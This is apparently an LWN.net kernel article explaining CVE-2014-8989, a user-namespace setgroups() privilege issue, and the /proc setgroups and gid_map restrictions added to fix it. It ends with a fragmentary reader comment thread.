User namespaces and setgroups()
Group membership can be used to restrict privilege in a couple of ways. Access control lists can explicitly block access to a resource on the basis of membership in a particular group. But it is even simpler than that: if a file's protection bits are set for "no group access," a process belonging to that group will be blocked, even if the file is otherwise accessible by the world as a whole. In either case, the ability to drop a group can enable a process to access a resource that would have otherwise been denied to it.
In current kernels, using setgroups() to change a process's group membership is a privileged operation. So unprivileged processes cannot use it to get rid of any inconvenient group memberships. But a process running within a user namespace is privileged inside that namespace, so a setgroups() call there will succeed. It is easy to write a little program that uses clone() to create a child in a user namespace and has the child call setgroups() to drop membership in all supplementary groups. This privilege-escalation vulnerability has become known as CVE-2014-8989.
Eric's fix for this problem starts by disabling the use of setgroups() within a user namespace until a group-ID mapping has been set up for that namespace. That mapping is created by writing the file gid_map in the process's /proc directory; see this article for details on how the mapping files work. Other user- or group-ID-oriented system calls require the existence of a mapping before they will succeed; setgroups() now has that restriction as well.
The biggest part of the patch adds a new control file, called setgroups, to the /proc directory for each process. Writing the string "deny" to that file will disable the setgroups() system call entirely within the namespace containing the relevant process. The CAP_SYS_ADMIN capability is required, so random processes cannot disable setgroups() in the top-level namespace; once again, a process within its own user namespace is privileged (by default) and can make this change successfully. Once setgroups() has been turned off, it cannot be enabled again in that namespace or any of its descendants. The setgroups file can only be written to before the group-ID mapping has been set.
Finally, an unprivileged process can only change the group-ID mapping of a namespace if setgroups() has been disabled. The only thing an unprivileged process can do with the group-ID mapping is to map its own primary group ID to the same ID in the parent namespace; an unprivileged process is not able to remap its supplementary groups. So, with this set of restrictions in place, it essentially become impossible to (1) play tricks with mappings to drop groups, or (2) call setgroups() at all without privilege.
Note that if a privileged process creates a user namespace, it can set up arbitrary mappings for group IDs and decline to disable setgroups(). That would make the dropping of groups within the namespace possible, but, since the process is already privileged, it could do that anyway.
The end result of all this work should be the closing of the vulnerability caused by being able to drop groups within a user namespace. But it highlights one of the hazards that come with the user namespace territory: while it seems possible to contain privilege within a user namespace, there is always the possibility of surprises like this one hiding in the corners of the system. It may be some time yet before we can be truly confident that all of those surprises have been found and that the unprivileged creation of user namespaces is truly a safe thing to allow.
Eric has asked Linus to pull these changes
for the 3.19 development cycle; that pull happened just as this week's
Edition was going to press. The patches have been marked for stable backporting
as well, so they should eventually become available in the stable update
series.
Index entries for this article | |
---|---|
Kernel | Namespaces/User namespaces |
Kernel | Negative groups |
Kernel | Security/Namespaces |
Posted Dec 18, 2014 18:34 UTC (Thu)
by josh (subscriber, #17465)
[Link] (5 responses)
Precisely because I'm waiting for the fallout from the patches described in this article before doing so. Once whatever patch is going to go in does so, I plan to send out a new version of both the setusers and unprivileged setgroups patches, the latter having some combination of compile-time and runtime enabling switches.
Posted Dec 18, 2014 21:37 UTC (Thu)
by zlynx (guest, #2285)
[Link] (4 responses)
Posted Dec 18, 2014 21:45 UTC (Thu)
by zlynx (guest, #2285)
[Link] (2 responses)
I'm not sure Windows is the very best security model to copy, but it is an idea. :-)
Posted Dec 18, 2014 22:20 UTC (Thu)
by bronson (subscriber, #4806)
[Link] (1 responses)
Posted Dec 19, 2014 10:34 UTC (Fri)
by etienne (guest, #25256)
[Link]
Possible to make it sane by supporting something like (in /etc/group):
Posted Dec 18, 2014 21:54 UTC (Thu)
by josh (subscriber, #17465)
[Link]
Posted Dec 23, 2014 20:09 UTC (Tue)
by rwmj (subscriber, #5474)
[Link]
User namespaces and setgroups()
User namespaces and setgroups()
User namespaces and setgroups()
User namespaces and setgroups()
User namespaces and setgroups()
games:x:60:-user1,-user2
which would mean everybody but those listed?
User namespaces and setgroups()
User namespaces and setgroups()